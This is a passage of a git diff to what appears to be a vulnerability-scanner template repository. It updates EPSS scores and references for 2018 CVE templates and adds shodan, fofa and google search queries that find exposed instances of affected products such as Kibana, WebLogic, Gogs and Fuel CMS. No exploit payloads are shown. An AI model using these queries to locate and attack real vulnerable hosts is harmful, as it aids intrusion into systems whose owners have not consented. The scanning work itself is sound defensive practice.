https://nvd.nist.gov/vuln/detail/CVE-2018-16761 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-16761 cwe-id: CWE-601 - epss-score: 0.00068 - epss-percentile: 0.28116 + epss-score: 0.00069 + epss-percentile: 0.29966 cpe: cpe:2.3:a:eventum_project:eventum:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: eventum_project product: eventum + shodan-query: http.favicon.hash:305412257 + fofa-query: icon_hash=305412257 tags: cve,cve2018,redirect,eventum,oss,eventum_project http: diff --git a/http/cves/2018/CVE-2018-16763.yaml b/http/cves/2018/CVE-2018-16763.yaml index ce8c147b8c..543356e243 100644 --- a/http/cves/2018/CVE-2018-16763.yaml +++ b/http/cves/2018/CVE-2018-16763.yaml @@ -20,13 +20,16 @@ info: cvss-score: 9.8 cve-id: CVE-2018-16763 cwe-id: CWE-74 - epss-score: 0.83285 - epss-percentile: 0.98356 + epss-score: 0.79227 + epss-percentile: 0.98278 cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: thedaylightstudio product: fuel_cms + shodan-query: http.title:"fuel cms" + fofa-query: title="fuel cms" + google-query: intitle:"fuel cms" tags: cve,cve2018,fuelcms,rce,edb,thedaylightstudio http: diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml index d98d6b1447..38a7254a31 100644 --- a/http/cves/2018/CVE-2018-16836.yaml +++ b/http/cves/2018/CVE-2018-16836.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-16836 cwe-id: CWE-22 epss-score: 0.26631 - epss-percentile: 0.96643 + epss-percentile: 0.96743 cpe: cpe:2.3:a:rubedo_project:rubedo:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml index d47482ca8a..df5c6fa029 100644 --- a/http/cves/2018/CVE-2018-16979.yaml +++ b/http/cves/2018/CVE-2018-16979.yaml @@ -27,6 +27,8 @@ info: max-request: 1 vendor: monstra product: monstra + shodan-query: http.favicon.hash:419828698 + fofa-query: icon_hash=419828698 tags: cve2018,cve,crlf,mostra,mostracms,cms,monstra,xss http: diff --git a/http/cves/2018/CVE-2018-17153.yaml b/http/cves/2018/CVE-2018-17153.yaml index 2a1cad77ca..5a40cf4a8c 100644 --- a/http/cves/2018/CVE-2018-17153.yaml +++ b/http/cves/2018/CVE-2018-17153.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-17153 cwe-id: CWE-287 - epss-score: 0.81607 - epss-percentile: 0.98273 + epss-score: 0.59445 + epss-percentile: 0.97757 cpe: cpe:2.3:o:western_digital:my_cloud_wdbctl0020hwt_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: western_digital product: my_cloud_wdbctl0020hwt_firmware shodan-query: http.favicon.hash:-1074357885 + fofa-query: icon_hash=-1074357885 tags: cve2018,cve,packetstorm,auth-bypass,rce,wdcloud,western_digital http: diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index 6fdc4ec1a6..7beff17567 100644 --- a/http/cves/2018/CVE-2018-17246.yaml +++ b/http/cves/2018/CVE-2018-17246.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: elastic product: kibana + shodan-query: http.title:"kibana" + fofa-query: title="kibana" + google-query: intitle:"kibana" tags: cve,cve2018,lfi,kibana,vulhub,elastic http: diff --git a/http/cves/2018/CVE-2018-17254.yaml b/http/cves/2018/CVE-2018-17254.yaml index cca82bc302..63ae0948f8 100644 --- a/http/cves/2018/CVE-2018-17254.yaml +++ b/http/cves/2018/CVE-2018-17254.yaml @@ -11,13 +11,16 @@ info: reference: - http://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html - https://www.exploit-db.com/exploits/45423/ + - https://github.com/Nickguitar/Joomla-JCK-Editor-6.4.4-SQL-Injection + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-17254 cwe-id: CWE-89 - epss-score: 0.81793 - epss-percentile: 0.98093 + epss-score: 0.81623 + epss-percentile: 0.9836 cpe: cpe:2.3:a:arkextensions:jck_editor:6.4.4:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index 28743e3369..18a7b2afcb 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-17422 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.44971 + epss-percentile: 0.45948 cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: dotcms product: dotcms shodan-query: http.title:"dotCMS" + fofa-query: title="dotcms" + google-query: intitle:"dotcms" tags: cve2018,cve,redirect,dotcms http: diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml index c0b21f42aa..805cbeff17 100644 --- a/http/cves/2018/CVE-2018-18264.yaml +++ b/http/cves/2018/CVE-2018-18264.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-18264 cwe-id: CWE-306 - epss-score: 0.96092 - epss-percentile: 0.99459 + epss-score: 0.95251 + epss-percentile: 0.9934 cpe: cpe:2.3:a:kubernetes:dashboard:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-18323.yaml b/http/cves/2018/CVE-2018-18323.yaml index 64fb92a805..d4f8177ae5 100644 --- a/http/cves/2018/CVE-2018-18323.yaml +++ b/http/cves/2018/CVE-2018-18323.yaml @@ -21,13 +21,16 @@ info: cvss-score: 7.5 cve-id: CVE-2018-18323 cwe-id: CWE-22 - epss-score: 0.9648 - epss-percentile: 0.99556 + epss-score: 0.95438 + epss-percentile: 0.99372 cpe: cpe:2.3:a:control-webpanel:webpanel:0.9.8.480:*:*:*:*:*:*:* metadata: max-request: 1 vendor: control-webpanel product: webpanel + shodan-query: http.title:"login | control webpanel" + fofa-query: title="login | control webpanel" + google-query: intitle:"login | control webpanel" tags: cve2018,cve,centos,lfi,packetstorm,control-webpanel,xss http: diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml index 5ba6bb99ba..ecb172f620 100644 --- a/http/cves/2018/CVE-2018-18570.yaml +++ b/http/cves/2018/CVE-2018-18570.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-18570 cwe-id: CWE-79 epss-score: 0.00098 - epss-percentile: 0.39642 + epss-percentile: 0.40792 cpe: cpe:2.3:a:planonsoftware:planon:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index c9d46aecf6..4e97a203a8 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml @@ -29,6 +29,7 @@ info: vendor: dedecms product: dedecms shodan-query: http.html:"DedeCms" + fofa-query: body="dedecms" tags: cve2018,cve,dedecms,xss http: diff --git a/http/cves/2018/CVE-2018-18777.yaml b/http/cves/2018/CVE-2018-18777.yaml index af06330091..27f9cdb3c9 100644 --- a/http/cves/2018/CVE-2018-18777.yaml +++ b/http/cves/2018/CVE-2018-18777.yaml @@ -14,13 +14,15 @@ info: - https://www.exploit-db.com/exploits/45755 - http://packetstormsecurity.com/files/150059/Microstrategy-Web-7-Cross-Site-Scripting-Traversal.html - https://nvd.nist.gov/vuln/detail/CVE-2018-18777 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N cvss-score: 4.3 cve-id: CVE-2018-18777 cwe-id: CWE-22 - epss-score: 0.00224 - epss-percentile: 0.60675 + epss-score: 0.00185 + epss-percentile: 0.5564 cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml index 1b1f7330fd..c43ce87f60 100644 --- a/http/cves/2018/CVE-2018-18778.yaml +++ b/http/cves/2018/CVE-2018-18778.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2018-18778 cwe-id: CWE-200 - epss-score: 0.17666 - epss-percentile: 0.96022 + epss-score: 0.39341 + epss-percentile: 0.97248 cpe: cpe:2.3:a:acme:mini-httpd:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml index 32940d4fec..ea93f406fa 100644 --- a/http/cves/2018/CVE-2018-18809.yaml +++ b/http/cves/2018/CVE-2018-18809.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.5 cve-id: CVE-2018-18809 cwe-id: CWE-22 - epss-score: 0.43128 - epss-percentile: 0.97253 + epss-score: 0.50316 + epss-percentile: 0.97524 cpe: cpe:2.3:a:tibco:jasperreports_library:*:*:*:*:activematrix_bpm:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: tibco product: jasperreports_library shodan-query: html:"jasperserver-pro" + fofa-query: body="jasperserver-pro" tags: cve2018,cve,packetstorm,seclists,lfi,kev,jasperserver,jasperreport,tibco http: diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index 568e65f5fe..963396b644 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -20,12 +20,15 @@ info: cve-id: CVE-2018-18925 cwe-id: CWE-384 epss-score: 0.09538 - epss-percentile: 0.94612 + epss-percentile: 0.94736 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: gogs product: gogs + google-query: intitle:"sign in - gogs" + shodan-query: cpe:"cpe:2.3:a:gogs:gogs" + fofa-query: title="sign in - gogs" tags: cve,cve2018,gogs,lfi,rce,vulhub http: diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml index 6439455c7b..afccd29931 100644 --- a/http/cves/2018/CVE-2018-19137.yaml +++ b/http/cves/2018/CVE-2018-19137.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-19137 cwe-id: CWE-79 - epss-score: 0.00096 - epss-percentile: 0.39294 + epss-score: 0.00072 + epss-percentile: 0.3103 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index e3bf2d980e..9f10e7535b 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-19287 cwe-id: CWE-79 - epss-score: 0.37007 - epss-percentile: 0.96816 + epss-score: 0.36152 + epss-percentile: 0.97155 cpe: cpe:2.3:a:ninjaforma:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -30,6 +30,9 @@ info: vendor: ninjaforma product: ninja_forms framework: wordpress + publicwww-query: /wp-content/plugins/ninja-forms/ + shodan-query: http.html:/wp-content/plugins/ninja-forms/ + fofa-query: body=/wp-content/plugins/ninja-forms/ tags: cve,cve2018,wp-plugin,wp,xss,authenticated,wpscan,edb,ninja-forms,wordpress,ninjaforma http: diff --git a/http/cves/2018/CVE-2018-19326.yaml b/http/cves/2018/CVE-2018-19326.yaml index 783a9f2a6f..f3bd161914 100644 --- a/http/cves/2018/CVE-2018-19326.yaml +++ b/http/cves/2018/CVE-2018-19326.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-19326 cwe-id: CWE-22 - epss-score: 0.01158 - epss-percentile: 0.83304 + epss-score: 0.00845 + epss-percentile: 0.82119 cpe: cpe:2.3:o:zyxel:vmg1312-b10d_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: zyxel product: vmg1312-b10d_firmware shodan-query: http.html:"VMG1312-B10D" + fofa-query: body="vmg1312-b10d" tags: cve2018,cve,lfi,modem,router,edb,zyxel http: diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml index 2b040cfd71..038510ea48 100644 --- a/http/cves/2018/CVE-2018-19365.yaml +++ b/http/cves/2018/CVE-2018-19365.yaml @@ -26,6 +26,9 @@ info: max-request: 1 vendor: wowza product: streaming_engine + shodan-query: http.title:"manager" product:"wowza streaming engine" + fofa-query: title="manager" product:"wowza streaming engine" + google-query: intitle:"manager" product:"wowza streaming engine" tags: cve2018,cve,wowza,lfi http: diff --git a/http/cves/2018/CVE-2018-19386.yaml b/http/cves/2018/CVE-2018-19386.yaml index fee4a77a5f..18852cc354 100644 --- a/http/cves/2018/CVE-2018-19386.yaml +++ b/http/cves/2018/CVE-2018-19386.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-19386 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.53963 + epss-percentile: 0.54797 cpe: cpe:2.3:a:solarwinds:database_performance_analyzer:11.1.457:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-19439.yaml b/http/cves/2018/CVE-2018-19439.yaml index 509be08df3..dcec2bddcb 100644 --- a/http/cves/2018/CVE-2018-19439.yaml +++ b/http/cves/2018/CVE-2018-19439.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-19439 cwe-id: CWE-79 - epss-score: 0.00548 - epss-percentile: 0.76986 + epss-score: 0.0038 + epss-percentile: 0.72872 cpe: cpe:2.3:a:oracle:secure_global_desktop:4.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-19458.yaml b/http/cves/2018/CVE-2018-19458.yaml index 954f356eee..6489b3df7e 100644 --- a/http/cves/2018/CVE-2018-19458.yaml +++ b/http/cves/2018/CVE-2018-19458.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-19458 cwe-id: CWE-287 - epss-score: 0.09157 - epss-percentile: 0.94094 + epss-score: 0.03301 + epss-percentile: 0.91309 cpe: cpe:2.3:a:php-proxy:php-proxy:3.0.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-19749.yaml b/http/cves/2018/CVE-2018-19749.yaml index 724cf401cd..6304862422 100644 --- a/http/cves/2018/CVE-2018-19749.yaml +++ b/http/cves/2018/CVE-2018-19749.yaml @@ -21,8 +21,8 @@ info: cvss-score: 4.8 cve-id: CVE-2018-19749 cwe-id: CWE-79 - epss-score: 0.00096 - epss-percentile: 0.39112 + epss-score: 0.00078 + epss-percentile: 0.33785 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19752.yaml b/http/cves/2018/CVE-2018-19752.yaml index f5d120debe..3d18f63916 100644 --- a/http/cves/2018/CVE-2018-19752.yaml +++ b/http/cves/2018/CVE-2018-19752.yaml @@ -20,8 +20,8 @@ info: cvss-score: 4.8 cve-id: CVE-2018-19752 cwe-id: CWE-79 - epss-score: 0.00096 - epss-percentile: 0.39112 + epss-score: 0.00078 + epss-percentile: 0.33785 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19753.yaml b/http/cves/2018/CVE-2018-19753.yaml index 1bb158960f..82d738f155 100644 --- a/http/cves/2018/CVE-2018-19753.yaml +++ b/http/cves/2018/CVE-2018-19753.yaml @@ -15,13 +15,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2018-19753 - http://seclists.org/fulldisclosure/2018/Nov/66 - http://packetstormsecurity.com/files/150541/Tarantella-Enterprise-Directory-Traversal.html + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-19753 cwe-id: CWE-22 - epss-score: 0.00942 - epss-percentile: 0.81358 + epss-score: 0.0066 + epss-percentile: 0.79557 cpe: cpe:2.3:a:oracle:tarantella_enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-19914.yaml b/http/cves/2018/CVE-2018-19914.yaml index 7e5a3adf5f..bf0f6435cf 100644 --- a/http/cves/2018/CVE-2018-19914.yaml +++ b/http/cves/2018/CVE-2018-19914.yaml @@ -21,8 +21,8 @@ info: cvss-score: 4.8 cve-id: CVE-2018-19914 cwe-id: CWE-79 - epss-score: 0.00153 - epss-percentile: 0.50703 + epss-score: 0.00126 + epss-percentile: 0.47199 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19915.yaml b/http/cves/2018/CVE-2018-19915.yaml index cb24374b98..4849988a1a 100644 --- a/http/cves/2018/CVE-2018-19915.yaml +++ b/http/cves/2018/CVE-2018-19915.yaml @@ -21,8 +21,8 @@ info: cvss-score: 4.8 cve-id: CVE-2018-19915 cwe-id: CWE-79 - epss-score: 0.00153 - epss-percentile: 0.50703 + epss-score: 0.00126 + epss-percentile: 0.47199 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20009.yaml b/http/cves/2018/CVE-2018-20009.yaml index 9825590c16..953e994164 100644 --- a/http/cves/2018/CVE-2018-20009.yaml +++ b/http/cves/2018/CVE-2018-20009.yaml @@ -14,13 +14,15 @@ info: - https://github.com/domainmod/domainmod/issues/88 - https://www.exploit-db.com/exploits/46372/ - https://nvd.nist.gov/vuln/detail/CVE-2018-20009 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2018-20009 cwe-id: CWE-79 - epss-score: 0.00153 - epss-percentile: 0.51511 + epss-score: 0.00126 + epss-percentile: 0.47199 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20470.yaml b/http/cves/2018/CVE-2018-20470.yaml index 596427d5aa..6401a9bde0 100644 --- a/http/cves/2018/CVE-2018-20470.yaml +++ b/http/cves/2018/CVE-2018-20470.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-20470 cwe-id: CWE-22 - epss-score: 0.60641 - epss-percentile: 0.97502 + epss-score: 0.2652 + epss-percentile: 0.96738 cpe: cpe:2.3:a:sahipro:sahi_pro:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-20526.yaml b/http/cves/2018/CVE-2018-20526.yaml index 0079a9708c..64e5e72dc3 100644 --- a/http/cves/2018/CVE-2018-20526.yaml +++ b/http/cves/2018/CVE-2018-20526.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-20526 cwe-id: CWE-434 epss-score: 0.00666 - epss-percentile: 0.79248 + epss-percentile: 0.79658 cpe: cpe:2.3:a:roxyfileman:roxy_fileman:1.4.5:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: roxyfileman product: roxy_fileman google-query: intitle:"Roxy file manager" + shodan-query: http.title:"roxy file manager" + fofa-query: title="roxy file manager" tags: cve,cve2018,roxy,fileman,rce,fileupload,intrusive,packetstorm,edb,roxyfileman http: diff --git a/http/cves/2018/CVE-2018-20824.yaml b/http/cves/2018/CVE-2018-20824.yaml index 4645993b11..4c87867f11 100644 --- a/http/cves/2018/CVE-2018-20824.yaml +++ b/http/cves/2018/CVE-2018-20824.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-20824 cwe-id: CWE-79 epss-score: 0.00203 - epss-percentile: 0.58306 + epss-percentile: 0.58262 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-20985.yaml b/http/cves/2018/CVE-2018-20985.yaml index e8ffc11fdb..9fcb7d32f2 100644 --- a/http/cves/2018/CVE-2018-20985.yaml +++ b/http/cves/2018/CVE-2018-20985.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-20985 cwe-id: CWE-20 - epss-score: 0.0117 - epss-percentile: 0.84668 + epss-score: 0.01061 + epss-percentile: 0.84101 cpe: cpe:2.3:a:payeezy:wp_payeezy_pay:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-2791.yaml b/http/cves/2018/CVE-2018-2791.yaml index 0e6c47c32d..cca5ece28d 100644 --- a/http/cves/2018/CVE-2018-2791.yaml +++ b/http/cves/2018/CVE-2018-2791.yaml @@ -20,7 +20,7 @@ info: cvss-score: 8.2 cve-id: CVE-2018-2791 epss-score: 0.02132 - epss-percentile: 0.88082 + epss-percentile: 0.89226 cpe: cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-2894.yaml b/http/cves/2018/CVE-2018-2894.yaml index d6912257c7..66281bf064 100644 --- a/http/cves/2018/CVE-2018-2894.yaml +++ b/http/cves/2018/CVE-2018-2894.yaml @@ -27,6 +27,9 @@ info: max-request: 3 vendor: oracle product: weblogic_server + shodan-query: http.title:"oracle peoplesoft sign-in" + fofa-query: title="oracle peoplesoft sign-in" + google-query: intitle:"oracle peoplesoft sign-in" tags: cve2018,cve,oracle,weblogic,rce,vulhub,intrusive http: diff --git a/http/cves/2018/CVE-2018-3167.yaml b/http/cves/2018/CVE-2018-3167.yaml index 361edf7681..bd77c65d17 100644 --- a/http/cves/2018/CVE-2018-3167.yaml +++ b/http/cves/2018/CVE-2018-3167.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2018-3167 - epss-score: 0.00492 - epss-percentile: 0.75672 + epss-score: 0.00519 + epss-percentile: 0.76719 cpe: cpe:2.3:a:oracle:application_management_pack:12.1.3:*:*:*:*:e-business_suite:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-3238.yaml b/http/cves/2018/CVE-2018-3238.yaml index 2b65131fd4..8fe945a216 100644 --- a/http/cves/2018/CVE-2018-3238.yaml +++ b/http/cves/2018/CVE-2018-3238.yaml @@ -20,7 +20,7 @@ info: cvss-score: 6.9 cve-id: CVE-2018-3238 epss-score: 0.00471 - epss-percentile: 0.75103 + epss-percentile: 0.75585 cpe: cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2018/CVE-2018-5230.yaml b/http/cves/2018/CVE-2018-5230.yaml index 837f9f59fe..40b848310b 100644 --- a/http/cves/2018/CVE-2018-5230.yaml +++ b/http/cves/2018/CVE-2018-5230.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-5230 cwe-id: CWE-79 - epss-score: 0.00203 - epss-percentile: 0.58306 + epss-score: 0.00153 + epss-percentile: 0.51584 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-5233.yaml b/http/cves/2018/CVE-2018-5233.yaml index d997d2d8bf..117df9b4f3 100644 --- a/http/cves/2018/CVE-2018-5233.yaml +++ b/http/cves/2018/CVE-2018-5233.yaml @@ -19,13 +19,14 @@ info: cve-id: CVE-2018-5233 cwe-id: CWE-79 epss-score: 0.00294 - epss-percentile: 0.6862 + epss-percentile: 0.69184 cpe: cpe:2.3:a:getgrav:grav_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: getgrav product: grav_cms shodan-query: html:"Grav CMS" + fofa-query: body="grav cms" tags: cve,cve2018,xss,grav,getgrav http: diff --git a/http/cves/2018/CVE-2018-5715.yaml b/http/cves/2018/CVE-2018-5715.yaml index f27254d25f..b0003b1f1d 100644 --- a/http/cves/2018/CVE-2018-5715.yaml +++ b/http/cves/2018/CVE-2018-5715.yaml @@ -29,6 +29,7 @@ info: product: sugarcrm shodan-query: http.html:"SugarCRM Inc. All Rights Reserved" google-query: intext:"SugarCRM Inc. All Rights Reserved" + fofa-query: body="sugarcrm inc. all rights reserved" tags: cve2018,cve,sugarcrm,xss,edb http: diff --git a/http/cves/2018/CVE-2018-6008.yaml b/http/cves/2018/CVE-2018-6008.yaml index 718403b416..e4e740a06e 100644 --- a/http/cves/2018/CVE-2018-6008.yaml +++ b/http/cves/2018/CVE-2018-6008.yaml @@ -13,13 +13,15 @@ info: - https://www.exploit-db.com/exploits/43913 - https://packetstormsecurity.com/files/146137/Joomla-Jtag-Members-Directory-5.3.7-Arbitrary-File-Download.html - https://nvd.nist.gov/vuln/detail/CVE-2018-6008 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-6008 cwe-id: CWE-200 epss-score: 0.3768 - epss-percentile: 0.96853 + epss-percentile: 0.97202 cpe: cpe:2.3:a:joomlatag:jtag_members_directory:5.3.7:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-6184.yaml b/http/cves/2018/CVE-2018-6184.yaml index 522a51ae06..9d3b618e4b 100644 --- a/http/cves/2018/CVE-2018-6184.yaml +++ b/http/cves/2018/CVE-2018-6184.yaml @@ -22,13 +22,14 @@ info: cve-id: CVE-2018-6184 cwe-id: CWE-22 epss-score: 0.00396 - epss-percentile: 0.72998 + epss-percentile: 0.73405 cpe: cpe:2.3:a:zeit:next.js:4.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zeit product: next.js shodan-query: html:"/_next/static" + fofa-query: body="/_next/static" tags: cve2018,cve,nextjs,lfi,traversal,zeit http: diff --git a/http/cves/2018/CVE-2018-6200.yaml b/http/cves/2018/CVE-2018-6200.yaml index 0d5d845508..dcaba6686e 100644 --- a/http/cves/2018/CVE-2018-6200.yaml +++ b/http/cves/2018/CVE-2018-6200.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: vbulletin product: vbulletin + google-query: intext:"powered by vbulletin" + shodan-query: http.title:"powered by vbulletin" + fofa-query: body="powered by vbulletin" tags: cve,cve2018,redirect,vbulletin http: diff --git a/http/cves/2018/CVE-2018-6910.yaml b/http/cves/2018/CVE-2018-6910.yaml index 1aab013c87..8ba372490a 100644 --- a/http/cves/2018/CVE-2018-6910.yaml +++ b/http/cves/2018/CVE-2018-6910.yaml @@ -27,6 +27,8 @@ info: max-request: 1 vendor: dedecms product: dedecms + fofa-query: body="dedecms" + shodan-query: http.html:"dedecms" tags: cve,cve2018,dedecms http: diff --git a/http/cves/2018/CVE-2018-7251.yaml b/http/cves/2018/CVE-2018-7251.yaml index a1c22b1ced..38ef7d5c37 100644 --- a/http/cves/2018/CVE-2018-7251.yaml +++ b/http/cves/2018/CVE-2018-7251.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-7251 cwe-id: CWE-200 epss-score: 0.06473 - epss-percentile: 0.93558 + epss-percentile: 0.93709 cpe: cpe:2.3:a:anchorcms:anchor:0.12.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-7282.yaml b/http/cves/2018/CVE-2018-7282.yaml index f346c8cd40..80f34c24ca 100644 --- a/http/cves/2018/CVE-2018-7282.yaml +++ b/http/cves/2018/CVE-2018-7282.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-7282 cwe-id: CWE-89 - epss-score: 0.15744 - epss-percentile: 0.95443 + epss-score: 0.1391 + epss-percentile: 0.95658 cpe: cpe:2.3:a:titool:printmonitor:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -27,6 +27,8 @@ info: product: printmonitor shodan-query: title:"PrintMonitor" product": printmonitor + fofa-query: title="printmonitor" + google-query: intitle:"printmonitor" tags: cve2018,cve,sqli,printmonitor,unauth,titool variables: username: "{{rand_base(6)}}" diff --git a/http/cves/2018/CVE-2018-7467.yaml b/http/cves/2018/CVE-2018-7467.yaml index 1360cf6272..93bad7a63c 100644 --- a/http/cves/2018/CVE-2018-7467.yaml +++ b/http/cves/2018/CVE-2018-7467.yaml @@ -14,13 +14,14 @@ info: - https://github.com/sullo/advisory-archives/blob/master/axxonsoft-next-CVE-2018-7467.txt - https://nvd.nist.gov/vuln/detail/CVE-2018-7467 - 